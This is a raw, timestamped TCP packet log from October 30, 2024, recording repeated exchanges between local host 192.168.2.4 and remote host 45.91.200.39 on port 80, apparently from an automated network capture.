                                                                                              Oct 30, 2024 19:47:05.234456062 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.234524965 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.234693050 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.234724045 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.234734058 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.234913111 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.261574030 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.261584044 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.261593103 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.261745930 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.261780977 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.261821985 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.261881113 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.261892080 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.261913061 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.261938095 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.261961937 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.261974096 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.261998892 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.262134075 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.262141943 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.262152910 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.262176037 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.262190104 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.262223005 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.262233019 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.262242079 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.262260914 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.262283087 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.262618065 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.262631893 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.262643099 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.262653112 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.262660027 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.262664080 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.262685061 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.262711048 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.263355970 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.263381958 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.263391018 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.263396978 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.263421059 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.263473988 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.263483047 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.263494015 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.263504982 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.263509989 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.263516903 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.263535976 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.263554096 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.263648987 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.263659000 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.263694048 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.263722897 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.263735056 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.263756990 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.263778925 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.263808012 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.263817072 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.263843060 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.351623058 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.351646900 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.351655960 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.351737976 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.351772070 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.351820946 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.351860046 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.351870060 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.351870060 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.351897001 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.351907969 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.378536940 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.378695011 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.378706932 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.378716946 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.378747940 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.378783941 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.379364967 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.379378080 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.379390955 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.379410028 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.379441023 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.379456043 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.379467964 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.379478931 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.379491091 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.379498959 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.379514933 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.379519939 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.379529953 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.379549026 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.379570007 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.379605055 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.379616976 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.379646063 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.379672050 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.379723072 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.379734993 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.379766941 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.379792929 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.379837990 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.379848957 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.379877090 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.379901886 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.379916906 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.379928112 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.379939079 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.379955053 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.379987955 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.380294085 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.380305052 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.380316019 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.380340099 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.380356073 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.380356073 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.380368948 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.380393028 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.380433083 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.380582094 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.380625010 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.380630016 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.380640984 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.380671978 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.380846977 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.380858898 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.380884886 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.380959034 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.380970955 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.380981922 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.380992889 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.381007910 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.381026983 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.381042957 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.639858961 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.639934063 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.639971972 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640007973 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640011072 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640043020 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640043020 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640067101 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640089035 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640095949 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640129089 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640134096 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640162945 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640168905 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640198946 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640202999 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640233994 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640238047 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640269041 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640271902 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640307903 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640311003 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640342951 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640345097 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640377045 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640386105 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640410900 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640413046 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640448093 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640451908 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640482903 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640491962 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640522957 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640522957 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640566111 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640639067 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640672922 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640680075 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640707016 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640712023 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640741110 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640747070 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640774965 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640777111 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640810013 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640814066 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640845060 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640846014 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640882969 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640887976 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640918970 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640925884 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640953064 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640955925 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.640988111 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.640990019 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.641022921 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641026974 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.641058922 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641058922 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.641094923 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641096115 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.641135931 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.641225100 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641258001 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641268015 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.641292095 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641295910 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.641321898 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641330004 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.641357899 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641362906 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.641392946 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641396999 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.641426086 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641431093 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.641460896 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641468048 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.641494989 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641499043 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.641530037 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641530991 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.641565084 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641568899 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.641602039 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641602039 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.641634941 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.641752958 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641787052 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641824007 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641856909 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641891956 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641927958 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.641928911 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641963005 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.641973972 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.641995907 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.642004967 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.642030001 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.642034054 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.642069101 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.646174908 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.646228075 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.646231890 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.646264076 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.646271944 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.646298885 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.646301031 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.646334887 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.646336079 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.646368980 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.646372080 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.646408081 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.646423101 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.646451950 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.646464109 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.646486044 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.646487951 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.646521091 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.646522999 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.646560907 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.646573067 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.646609068 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.646610022 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.646641970 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.646645069 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.646678925 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.646678925 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.646713018 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.646718025 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.646748066 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.646749973 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.646786928 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.646917105 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.646965981 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.646970034 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.647006035 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.647011995 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.647044897 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.647059917 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.647094011 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.647111893 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.647129059 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.647131920 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.647165060 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.647166014 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.647203922 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.647227049 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.647259951 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.647264957 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.647294998 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.647300005 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.647334099 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.647588968 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.647630930 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.647633076 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.647644043 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.647670031 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.647691965 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.647758007 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.647768974 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.647780895 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.647794962 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.647806883 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.647831917 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.647893906 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.647905111 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.647913933 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.647933006 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.647947073 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.702517033 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.702542067 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.702552080 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.702595949 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.702631950 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.703361988 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.703423977 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.703722954 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.703771114 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.730184078 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.730252028 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.730262041 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.730273008 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.730302095 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.730330944 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.730350971 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.730360985 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.730391026 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.730492115 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.730531931 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.730540991 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.730541945 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.730575085 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.730590105 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.730623007 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.730812073 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.730820894 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.730827093 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.730885983 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.730912924 CET4973080192.168.2.445.91.200.39
